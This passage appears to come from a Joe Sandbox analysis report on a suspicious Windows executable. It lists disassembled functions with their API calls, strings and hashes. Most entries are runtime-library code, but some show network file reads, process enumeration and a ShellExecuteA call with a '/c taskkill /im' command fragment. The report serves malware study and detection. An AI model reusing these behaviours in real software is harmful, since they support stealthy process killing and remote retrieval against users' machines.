Instruction Fuzzy Hash: B28135B1D022059FCF20AEA58841AEF7BB59F09314F19045BE814B7381D639CDE1CBAB

Function 0041202C Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 004120B0
__alloca_probe_16.LIBCMT ref: 00412176
__freea.LIBCMT ref: 004121E2

Part of subcall function 0041225F: RtlAllocateHeap.NTDLL(00000000,?,?,?,00408E8B,?,?,?,004010DD,?,004027B7,?,?,?), ref: 00412291

__freea.LIBCMT ref: 004121EB
__freea.LIBCMT ref: 0041220E

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 7d7780961edacd09c978861a326fc5f9051ba6a4afcdafa58391744c83afc7d3
Instruction ID: 5a56814c20c2812d58e2bd117c1fcaad10f3c42416adeada56a92cbea095d008
Opcode Fuzzy Hash: 7d7780961edacd09c978861a326fc5f9051ba6a4afcdafa58391744c83afc7d3
Instruction Fuzzy Hash: 12510872600106BBDB219F518D41EFF3AA9DF84754F15012BFE04E7250EBB8DDA187A8

Function 0040F3C5 Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041225F: RtlAllocateHeap.NTDLL(00000000,?,?,?,00408E8B,?,?,?,004010DD,?,004027B7,?,?,?), ref: 00412291

_free.LIBCMT ref: 0040F4D4
_free.LIBCMT ref: 0040F4EB
_free.LIBCMT ref: 0040F508
_free.LIBCMT ref: 0040F523
_free.LIBCMT ref: 0040F53A

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 862a989fc802d8a6d8d8f51e3c9b5d915835a0ccc93d061f4c49a26a196068e5
Instruction ID: 05b4aece918a30f6ce011ee6570a444bc415add4e946a82f3ec8d1925da52f84
Opcode Fuzzy Hash: 862a989fc802d8a6d8d8f51e3c9b5d915835a0ccc93d061f4c49a26a196068e5
Instruction Fuzzy Hash: 5B51B171A00604AFDB209F6ACC41BAB77F4EF58724B10457EE809E7691E739EA458B48

Function 005FF62C Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006024C6: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 006024F8

_free.LIBCMT ref: 005FF73B
_free.LIBCMT ref: 005FF752
_free.LIBCMT ref: 005FF76F
_free.LIBCMT ref: 005FF78A
_free.LIBCMT ref: 005FF7A1

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: dce2c5a0e09397c5f7c4ac813fbc7aa752a95d750f6506e7fb9933a3d3d52066
Instruction ID: 6685799237425a26701bab39c67747706840dd2fd2b6243622105877b743799c
Opcode Fuzzy Hash: dce2c5a0e09397c5f7c4ac813fbc7aa752a95d750f6506e7fb9933a3d3d52066
Instruction Fuzzy Hash: 8B51B472A00609AFDB25EF29CC41ABABBF5FF44720F144579E909DB6A0E735E901CB44

Function 005F2FC7 Relevance: 7.7, APIs: 5, Instructions: 162COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 005F304A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 005F3096
__Getctype.LIBCPMT ref: 005F30AF
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 005F30CB
std::_Lockit::~_Lockit.LIBCPMT ref: 005F3160

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID:
API String ID: 1840309910-0
Opcode ID: 340212e5769ce11c4ca132c247af826724228569a08e38620ff75d7b1cbfd6ac
Instruction ID: 411c4e2648bd38a6d6e9abdf45ea7c4fa0a9227fbd6437c20a4d8cd2e909e368
Opcode Fuzzy Hash: 340212e5769ce11c4ca132c247af826724228569a08e38620ff75d7b1cbfd6ac
Instruction Fuzzy Hash: 3A5182B1D0424D9BEF10DFA4D949BAEBFB8BF14310F144529E904A7341EB39AA04C796

Function 00417244 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041725C

Part of subcall function 004110CB: RtlFreeHeap.NTDLL(00000000,00000000,?,004174E5,?,00000000,?,?,?,00417788,?,00000007,?,?,00417C7B,?), ref: 004110E1
Part of subcall function 004110CB: GetLastError.KERNEL32(?,?,004174E5,?,00000000,?,?,?,00417788,?,00000007,?,?,00417C7B,?,?), ref: 004110F3

_free.LIBCMT ref: 0041726E
_free.LIBCMT ref: 00417280
_free.LIBCMT ref: 00417292
_free.LIBCMT ref: 004172A4

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a2d144236a9489355ea93521120974014db54e99a7ca6d51e2cabe08b1cb5a96
Instruction ID: 40e34cc744bc2574e0b5526e793a8a252296d0a24a979cdc24cf8984e493e67e
Opcode Fuzzy Hash: a2d144236a9489355ea93521120974014db54e99a7ca6d51e2cabe08b1cb5a96
Instruction Fuzzy Hash: F7F09632A09690AB8630DB55F486D9777F9AB08764794088BF448D7A12CB3CFCD34E5C

Function 006074AB Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 006074C3

Part of subcall function 00601332: HeapFree.KERNEL32(00000000,00000000,?,0060774C,?,00000000,?,?,?,006079EF,?,00000007,?,?,00607EE2,?), ref: 00601348
Part of subcall function 00601332: GetLastError.KERNEL32(?,?,0060774C,?,00000000,?,?,?,006079EF,?,00000007,?,?,00607EE2,?,?), ref: 0060135A

_free.LIBCMT ref: 006074D5
_free.LIBCMT ref: 006074E7
_free.LIBCMT ref: 006074F9
_free.LIBCMT ref: 0060750B

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 55fdad49d3e940d6adefd3a91a74bc3a70a54511d14fa9b810ed781da0bb3105
Instruction ID: 83a05a667ce1feff9c8d886d7f1d12e2302cfb76334eb5234783be5ce34aaf97
Opcode Fuzzy Hash: 55fdad49d3e940d6adefd3a91a74bc3a70a54511d14fa9b810ed781da0bb3105
Instruction Fuzzy Hash: 0BF01232A88614ABC67CDB68E886C9777DBAB057207944C19F448DBA81CB34FC918A5C

Function 005F1B47 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 298networkfileCOMMON

Download Yara Rule

APIs

InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 005F1BCC
InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 005F1BEB

Strings

o_, xrefs: 005F1DF4

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: FileInternet$PointerRead
String ID: o_
API String ID: 3197321146-4253069201
Opcode ID: 17569642d36637f074f2c595ad38925968b63db4bd111cc1be1286cf2d4fcacc
Instruction ID: b90e9008182d51ed13d28692be810a069518fd9e3e3756e1d90c2bd3c47d0ed2
Opcode Fuzzy Hash: 17569642d36637f074f2c595ad38925968b63db4bd111cc1be1286cf2d4fcacc
Instruction Fuzzy Hash: 28C17A70A002189FEB25CF24CD89BEABBB9FF49304F1045D8E509A7691DB75AE84CF54

Function 005F5487 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 005F33F7: ___std_exception_copy.LIBVCRUNTIME ref: 005F3486

std::locale::_Init.LIBCPMT ref: 005F5595

Part of subcall function 005F74ED: std::_Lockit::_Lockit.LIBCPMT ref: 005F74FF
Part of subcall function 005F74ED: std::locale::_Setgloballocale.LIBCPMT ref: 005F751A
Part of subcall function 005F74ED: _Yarn.LIBCPMT ref: 005F7530
Part of subcall function 005F74ED: std::_Lockit::~_Lockit.LIBCPMT ref: 005F7570

Part of subcall function 005F5E47: std::_Lockit::_Lockit.LIBCPMT ref: 005F5E7D
Part of subcall function 005F5E47: std::_Lockit::_Lockit.LIBCPMT ref: 005F5EA0
Part of subcall function 005F5E47: std::_Lockit::~_Lockit.LIBCPMT ref: 005F5EC0
Part of subcall function 005F5E47: std::_Lockit::~_Lockit.LIBCPMT ref: 005F5F3A

std::locale::_Init.LIBCPMT ref: 005F5658
Concurrency::cancel_current_task.LIBCPMT ref: 005F576F

Strings

lyB, xrefs: 005F54E6

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_std::locale::_$Init$Concurrency::cancel_current_taskSetgloballocaleYarn___std_exception_copy
String ID: lyB
API String ID: 569503877-3634563413
Opcode ID: 5e5887fceda1115ca962e411151ef7f0af2aa84fa02ed1d638ff21a49875db75
Instruction ID: 1b9a533edfe330c5f177083337735c3c2cad922d97d99e426ba46ec6e8599ba6
Opcode Fuzzy Hash: 5e5887fceda1115ca962e411151ef7f0af2aa84fa02ed1d638ff21a49875db75
Instruction Fuzzy Hash: E6A125B0A00609DFDB10CF54C598BAABBF0FF49314F1581A9E9099F792D779A944CF90

Function 005F36C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(0042A018), ref: 005F36F3

Part of subcall function 005F3627: OpenProcess.KERNEL32(00000410,00000000), ref: 005F3652
Part of subcall function 005F3627: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 005F366D
Part of subcall function 005F3627: CloseHandle.KERNEL32(00000000), ref: 005F3674

GetCurrentProcessId.KERNEL32 ref: 005F370F

Part of subcall function 005F3527: OpenProcess.KERNEL32(00000410,00000000), ref: 005F3587
Part of subcall function 005F3527: K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 005F35A4
Part of subcall function 005F3527: K32GetModuleBaseNameA.KERNEL32(00000000,?,?,00000104), ref: 005F35C1
Part of subcall function 005F3527: CloseHandle.KERNEL32(00000000), ref: 005F35C8

ShellExecuteA.SHELL32(00000000,00000000,004278B0,00000000,00000000,00000000), ref: 005F37B0

Strings

/c taskkill /im ", xrefs: 005F3723

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentHandleModuleNameOpen$BaseEnumExecuteFileModulesShell
String ID: /c taskkill /im "
API String ID: 3296006795-2842225094
Opcode ID: b3375a236c46a470e38a8e354ebc4db9882fc7f181f3602ddbb500160f214fec
Instruction ID: 737aca622f0f131952adad1220fbfba6ca1a19e5c1794bc50b61f9c33693e635
Opcode Fuzzy Hash: b3375a236c46a470e38a8e354ebc4db9882fc7f181f3602ddbb500160f214fec
Instruction Fuzzy Hash: AC2192B0E0525C9BD700FB64CC1ABFD7BB4BB54700F904468E205A31D6EF786A49CB55

Function 005F33F7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 005F3486

Part of subcall function 005F9337: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,005F1344,?,005F729C,?,00428ED8,?,?,?,?,005F1344,0042BBA0,0042BBA1), ref: 005F9397

Strings

ios_base::eofbit set, xrefs: 005F343B
ios_base::failbit set, xrefs: 005F3436
ios_base::badbit set, xrefs: 005F342C

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: be0a63a82a4a47f107d957bd384f5f0d736986eeb1f1acf37ba2c00c1f66391f
Instruction ID: 72d6f6010748a7b739066353b2de22104e83f2ba8c95a8667dcabb82f4c424cb
Opcode Fuzzy Hash: be0a63a82a4a47f107d957bd384f5f0d736986eeb1f1acf37ba2c00c1f66391f
Instruction Fuzzy Hash: 6E115CB1A047095BC700EF58D809FA6BBE8BF40310F54C52BFA1587681EB78E900CB95

Function 0060B70A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0060B775
_free.LIBCMT ref: 0060B784
_free.LIBCMT ref: 0060B793

Strings

xi`, xrefs: 0060B75F

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable
String ID: xi`
API String ID: 1464849758-1546539340
Opcode ID: 455833bc4adfb508f61434fa31475e2ff3932e6ddbee6307f9f106a9ce602a96
Instruction ID: 4b0437ea70d0d16cc039f5d85dc669f400a5e486edc142132adcaa92d367d393
Opcode Fuzzy Hash: 455833bc4adfb508f61434fa31475e2ff3932e6ddbee6307f9f106a9ce602a96
Instruction Fuzzy Hash: AB113DB1C44218ABDF059FA99C855EFFFB9BF09310F54806EE404B2251D7754A45CFA8

Function 0040E06D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0040E0B5

Strings

h0~, xrefs: 0040E0A7
h0~, xrefs: 0040E0A0

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free
String ID: h0~$h0~
API String ID: 269201875-1724009670
Opcode ID: 424a460a3c98dfd16e7cf12a6f88da53bfda3e6b143f82b514351f9f091a92ac
Instruction ID: 5b1735bc5c07eaf41ce0cc97b1f9d66d83a59bff2348be5a2802b42f0109b74b
Opcode Fuzzy Hash: 424a460a3c98dfd16e7cf12a6f88da53bfda3e6b143f82b514351f9f091a92ac
Instruction Fuzzy Hash: C2E0E532A0253041D231273B7C013AB16D5CBC1739B220A3BF620971E2DFBC48D361AE

Function 0040AB3B Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0040AC02
___AdjustPointer.LIBCMT ref: 0040AC25
___AdjustPointer.LIBCMT ref: 0040ACC1

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: e56fc4c34e830f7f8a95df18c421255ebb375cb85253546a85459bcb0c0dc06c
Instruction ID: c0843d3cfc9df6add7981269c83eafd165e6a56bb751444f6c2e9966cc8cc543
Opcode Fuzzy Hash: e56fc4c34e830f7f8a95df18c421255ebb375cb85253546a85459bcb0c0dc06c
Instruction Fuzzy Hash: BE510472608706AFEB299F11D441BAA73A5EF04304F15413FE9026B3D1D739EC61D79A

Function 005FADA2 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 005FAE69
___AdjustPointer.LIBCMT ref: 005FAE8C
___AdjustPointer.LIBCMT ref: 005FAF28

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: e56fc4c34e830f7f8a95df18c421255ebb375cb85253546a85459bcb0c0dc06c
Instruction ID: ffb8a568dd0f23e4287734be97ebc804530e45517e24531e2306fe3e1f332003
Opcode Fuzzy Hash: e56fc4c34e830f7f8a95df18c421255ebb375cb85253546a85459bcb0c0dc06c
Instruction Fuzzy Hash: 7051E2F6A0060EAFEB259F10D844B7A7BA8FF40310F144529EB4957290E739ED40DB93

Function 004153F1 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 0040D7C8: _free.LIBCMT ref: 0040D7D6

Part of subcall function 00415131: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,004121D8,?,00000000,00000000), ref: 004151DD

GetLastError.KERNEL32 ref: 00415459
__dosmaperr.LIBCMT ref: 00415460
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041549F
__dosmaperr.LIBCMT ref: 004154A6

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: e2c9c4d2872a52d685cdf4e0a8c34d200d4c1da6343d4d81b36e7d253fa6cf7b
Instruction ID: 99a3decd1954917eba6d16c9b05beff0a93cc87d8cb77d71892b1e651869de98
Opcode Fuzzy Hash: e2c9c4d2872a52d685cdf4e0a8c34d200d4c1da6343d4d81b36e7d253fa6cf7b
Instruction Fuzzy Hash: 4B219771600A15EFDB20AF628CC0AEB775CAF44369710862EF82997651D73CDCC14799

Function 00605658 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 005FDA2F: _free.LIBCMT ref: 005FDA3D

Part of subcall function 00605398: WideCharToMultiByte.KERNEL32(00427803,00000000,005FCFB5,00000000,00000000,00000000,00000000,0000FDE9,00427803,00000000,005FCFB5,?,00602CCF,?,00000000,00000000), ref: 00605444

GetLastError.KERNEL32 ref: 006056C0
__dosmaperr.LIBCMT ref: 006056C7
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00605706
__dosmaperr.LIBCMT ref: 0060570D

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 88d6111f051a06fdd9aa7796033ffeb93d916343d6300842a6459e322090b897
Instruction ID: 095a077f572028d30113dae8967fb8b63fd8e8e34eccc479f25b4cfd691b7710
Opcode Fuzzy Hash: 88d6111f051a06fdd9aa7796033ffeb93d916343d6300842a6459e322090b897
Instruction Fuzzy Hash: EF212B71540A09AFDB246F668C848BBBB6EFF443A47108528F91A97290E735EC409FA0

Function 00601542 Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 129cbb2c69f00aee2ade31a09bffe59ed12de1c91300b81d07dce6b1e3195e12
Instruction ID: 94a4db03a2fb33837a6569922d4eab02b55ffb2cabc4c607098293ee767017fe
Opcode Fuzzy Hash: 129cbb2c69f00aee2ade31a09bffe59ed12de1c91300b81d07dce6b1e3195e12
Instruction Fuzzy Hash: DB21C6F1FC1225ABC73B9A249C41B9B3796AB867A0F250524EC17AF2D1E730DD01C6E4

Function 00410BB0 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00401F35,?,00401F39,0040C2E1,?,00401F35,?,?,00410E60,00000000,?,00000000,00000000,00401F35), ref: 00410BB5
_free.LIBCMT ref: 00410C12
_free.LIBCMT ref: 00410C48
SetLastError.KERNEL32(00000000,00000008,000000FF,?,00410E60,00000000,?,00000000,00000000,00401F35), ref: 00410C53

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: f2e67e759cbc230cdaa1d2862d8a8c8d889a1c675500eddce8c3c579db9c65d2
Instruction ID: 16567a3b951fdb1af9fb9db486e2f3e85037a17d859c37d5ae99fc084580b7c3
Opcode Fuzzy Hash: f2e67e759cbc230cdaa1d2862d8a8c8d889a1c675500eddce8c3c579db9c65d2
Instruction Fuzzy Hash: 141157713041027B862123B65C81DFB215A97C037DB20033BF719922E1EEAC8CD2866C

Function 00600E17 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(005F219C,?,005F21A0,005FC548,?,005F219C,?,?,006010C7,00000000,?,00000000,00000000,005F219C), ref: 00600E1C
_free.LIBCMT ref: 00600E79
_free.LIBCMT ref: 00600EAF
SetLastError.KERNEL32(00000000,0042A190,000000FF,?,006010C7,00000000,?,00000000,00000000,005F219C), ref: 00600EBA

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 7711921faead9846348d7d43881275752e518af8df4d01021872436eff613b10
Instruction ID: 1cebb3cc4e644c264755123e6b3448a99995bd70787c5aaeaf808b609a2f814d
Opcode Fuzzy Hash: 7711921faead9846348d7d43881275752e518af8df4d01021872436eff613b10
Instruction Fuzzy Hash: 3811E3726C02026BE76E6674DC85F7B255BABC2374F24463CF629A62D2DA608C129129

Function 005F3527 Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000), ref: 005F3587
K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 005F35A4
K32GetModuleBaseNameA.KERNEL32(00000000,?,?,00000104), ref: 005F35C1
CloseHandle.KERNEL32(00000000), ref: 005F35C8

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Process$BaseCloseEnumHandleModuleModulesNameOpen
String ID:
API String ID: 4241681289-0
Opcode ID: 6e97a0bbe99a8817cca93cc005c5cdeec1f59b1f400566ea782293005558fb76
Instruction ID: 513aba09578df0f68ce78552db548e930ceb28e44cd3664787558c74ae8f0987
Opcode Fuzzy Hash: 6e97a0bbe99a8817cca93cc005c5cdeec1f59b1f400566ea782293005558fb76
Instruction Fuzzy Hash: 2B21A47590021DABD725AF24CC05BFDBBB8BF49300F0441A9E64897250DBB55BC5CB95

Function 00410D07 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0040C276,004122A2,?,?,00408E8B,?,?,?,004010DD,?,004027B7,?,?), ref: 00410D0C
_free.LIBCMT ref: 00410D69
_free.LIBCMT ref: 00410D9F
SetLastError.KERNEL32(00000000,00000008,000000FF,?,00408E8B,?,?,?,004010DD,?,004027B7,?,?,?), ref: 00410DAA

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: b9160d0b3d4d87b20d99a57ab81e8c3abcaf29d7a7b985f7aa56973a667d2986
Instruction ID: 7637a8e954844150482e906e9d4de423686c0f8f15f2d6deaf15595594a1518b
Opcode Fuzzy Hash: b9160d0b3d4d87b20d99a57ab81e8c3abcaf29d7a7b985f7aa56973a667d2986
Instruction Fuzzy Hash: 141129B17001027B962163B67C81EFB255BD7C43B8B64023BF71A962E1DEAC8CD2912D

Function 00600F6E Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,005FC4DD,00602509,?,?,005F90F2,?,?,?,005F1344,?,005F2A1E,?,?), ref: 00600F73
_free.LIBCMT ref: 00600FD0
_free.LIBCMT ref: 00601006
SetLastError.KERNEL32(00000000,0042A190,000000FF,?,005F90F2,?,?,?,005F1344,?,005F2A1E,?,?,?), ref: 00601011

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 5d85b3db14f18b1b980a709a44521e403c35b10a36c4c9dadebe9684ae6dc349
Instruction ID: a97cd1074a95e41c45a236be417a88636e88d902b9fe2e085c5eafa8ff969d1b
Opcode Fuzzy Hash: 5d85b3db14f18b1b980a709a44521e403c35b10a36c4c9dadebe9684ae6dc349
Instruction Fuzzy Hash: A21129727C42026FE76D6A749C81B7B215FDBC2375F20423CFA199A2D1DE618C12A11D

Function 005FBE5E Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,005FBF1F,?,?,0042B440,00000000,?,005FC04A,00000004,0041EB28,0041EB20,0041EB28,00000000), ref: 005FBEEE

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: da84090441890d50f9cbdf5a97449929467e511c8f269dd5155a12c56a084703
Instruction ID: bde72503edd778d4f31e380c37490d7c7be9f757fee33ce8cc7636b1d2d07380
Opcode Fuzzy Hash: da84090441890d50f9cbdf5a97449929467e511c8f269dd5155a12c56a084703
Instruction Fuzzy Hash: 0211A771F40629EBEB218B69DC417EA3B98BF05760F150120EB10E72C0D764ED0086E5

Function 00430647 Relevance: 6.0, APIs: 4, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00431008,0043094E), ref: 00430663
FreeEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00431008,0043094E), ref: 0043067D
HeapDestroy.KERNEL32(00000000,00000000,00000000,00431008,0043094E), ref: 00430697
GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 0043069E

Memory Dump Source

Source File: 00000000.00000002.2073120364.000000000042F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0042F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_42f000_file.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
String ID:
API String ID: 367530164-0
Opcode ID: ef9be96c18c71de3348f79a9507502d7f71bc1826194ce81bdb771ff23fd9940
Instruction ID: 2d55d2210e20bc5907f44b8819978bba8596720ac3387e20d1b847876d834e07
